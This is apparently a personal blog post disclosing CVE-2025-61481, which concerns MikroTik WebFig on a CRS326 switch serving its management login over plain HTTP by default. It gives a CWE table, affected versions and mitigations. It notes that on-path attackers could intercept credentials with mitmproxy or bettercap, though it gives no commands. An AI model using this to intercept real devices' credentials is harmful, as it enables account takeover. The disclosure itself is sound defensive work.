When I was testing a CRS326-24G-2S+ running RouterOS 7.14.2, I noticed that it doesn’t use HTTPS by default. The management interface, WebFig, loads entirely over plain HTTP even after a factory reset.
I did a few quick tests and confirmed it with a packet capture. Every request, including the login credentials, is visible on the wire. The client script even stores the username and password in sessionStorage before navigation, so it’s easy to intercept.
This kind of weak default configuration falls under common weakness categories (CWE-319: Cleartext Transmission of Sensitive Information, and generally weak management-plane protection). It’s the sort of thing that should be tracked and fixed, so I reported it to MITRE.
From an attacker’s point of view, this is trivial to exploit. Anyone on the same network segment can run a man-in-the-middle setup with tools like mitmproxy or bettercap and intercept or modify the traffic. It doesn’t take anything advanced.
The behavior seems consistent across both RouterOS and SwOS. I only tested it on the CRS326-24G-2S+, but I’d expect other devices using the same WebFig component to act the same way.
Impact:
Management-plane credential exposure and potential tampering by an on-path attacker.
| CWE | Name | Explanation |
|---|---|---|
| CWE-1188 | Initialization of a Resource with an Insecure Default | The WebFig service is initialized with HTTP as default instead of HTTPS, exposing sensitive data. |
| CWE-319 | Cleartext Transmission of Sensitive Information | Management traffic and credentials are sent over HTTP. |
| CWE-200 | Exposure of Sensitive Information | Credentials and actions can be observed by on-path attackers. |
Affected versions:
- RouterOS 7.14.2 (stable)
- SwitchOS 2.18 (tested on CRS326-24G-2S+)
Other models using the same WebFig component are probably affected as well.
Mitigation:
Keep management interfaces on trusted, isolated networks.
If possible, enable HTTPS for WebFig or access the device through a VPN tunnel.
Alternatively, use SSH or API access over encrypted channels.
Until MikroTik changes this default behavior, treat all HTTP-only management interfaces as unencrypted and sensitive.
CVE: CVE-2025-61481
// Oliver
Lämna ett svar